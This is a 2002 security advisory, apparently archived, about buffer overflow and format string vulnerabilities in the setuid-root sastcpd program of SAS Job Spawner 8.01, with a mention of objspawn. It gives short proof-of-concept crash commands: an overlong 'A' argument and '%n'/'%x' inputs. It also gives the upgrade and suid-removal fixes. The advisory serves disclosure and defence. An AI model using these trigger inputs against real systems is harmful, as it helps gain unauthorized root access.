30th Jan 2002 [SBWID-5047]
COMMAND
sastcpd Buffer Overflow and Format String Vulnerabilities
SYSTEMS AFFECTED
SAS Job Spawner for Open Systems version 8.01
PROBLEM
From the Digital Shadow advisory [http://www.ministryofpeace.co.uk]:
Since sastcpd is installed uid 0 by default, full root privileges can
be obtained through exploitation of either of the vulnerabilities
below:
$ sastcpd `perl -e "print 'A' x 1200"`
Invalid argument: AAAA[..cut..]AAAA.
Segmentation fault (core dumped)
$ ls -la core
-rw------- 1 root teknix 1454382 Jan 28 04:22 core
$ sastcpd %n
Segmentation fault (core dumped)
$ sastcpd %x
Invalid argument: 2.
"Ellipse" added:
It appears that the objspawn program included with the SAS/Integration
Technologies product is also vulnerable to these bugs. objspawn is also
a setuid root executable by default. See the above link for more
information.
SOLUTION
SAS Support say that these problems were fixed in version 8.2:
http://www.sas.com/service/techsup/unotes/SN/004/004201.html
Also, removing the suid bit seems to solve the problem without breaking
the software.